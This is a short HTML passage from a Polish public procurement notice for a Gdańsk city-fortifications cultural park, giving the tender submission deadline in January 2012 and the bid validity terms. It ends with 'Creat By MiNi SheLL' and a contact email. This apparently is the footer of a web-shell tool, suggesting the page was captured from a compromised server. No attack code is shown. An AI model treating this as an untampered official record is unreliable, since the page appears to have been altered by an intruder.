80-802 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2012 godzina 10:00, miejsce: Park Kulturowy Fortyfikacji Miejskich Twierdza Gdańsk
ul. Gradowa 6,
80-802 Gdańsk 
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com